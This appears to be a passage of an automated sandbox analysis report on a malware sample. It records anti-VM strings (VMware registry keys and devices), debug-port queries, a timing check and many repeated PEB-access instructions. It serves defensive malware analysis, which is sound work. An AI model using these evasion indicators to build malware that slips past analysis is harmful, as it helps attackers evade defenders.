            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00409B10 LdrLoadDll,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01423540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01478D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0142A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014341E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01458DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014269A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014705AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014705AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01471074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01462073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0147740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0147740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0147740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01474015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01474015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01478CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014614FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01423884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01423884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01478B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01478F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0147070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0147070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013ADB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013ADB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014253CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014253CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0145D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01475BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01434257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0145B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0145B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01478A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B8A0A mov eax, dword ptr fs:[00000030h]
